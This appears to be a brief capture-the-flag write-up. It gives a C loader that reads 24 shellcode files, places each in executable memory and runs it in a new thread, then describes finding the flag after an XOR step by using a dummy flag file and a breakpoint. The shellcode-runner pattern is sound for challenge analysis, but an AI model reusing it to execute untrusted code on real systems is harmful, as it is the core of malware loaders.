 #include <windows.h> void load_shellcode(int index) { FILE* fp; DWORD dwThread; int size; CHAR filename[32]; sprintf_s(filename, "b%i", index); fopen_s(&fp, filename, "rb"); fseek(fp, 0, SEEK_END); size = ftell(fp); fseek(fp, 0, SEEK_SET); LPVOID pMem = VirtualAlloc( NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); printf("Loaded %i | size=%i | at %p\n", index, size, pMem); fread(pMem, 1, size, fp); CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pMem, 0, 0, &dwThread); fclose(fp); } int main() { load_shellcode(21); Sleep(1000); for (int i = 1; i <= 24; i++) { if (i == 21) continue; load_shellcode(i); } while (1) Sleep(1000); } 

I created C:\beeps\flag.txt with some dummy content (length is 17 as hinted by one of the shellcodes) and also set a breakpoint at module doing xor with buffer (#6).

Program executed and flag showed up in memory after XOR operation.

Flag: zn{$ucH SL0W !pC}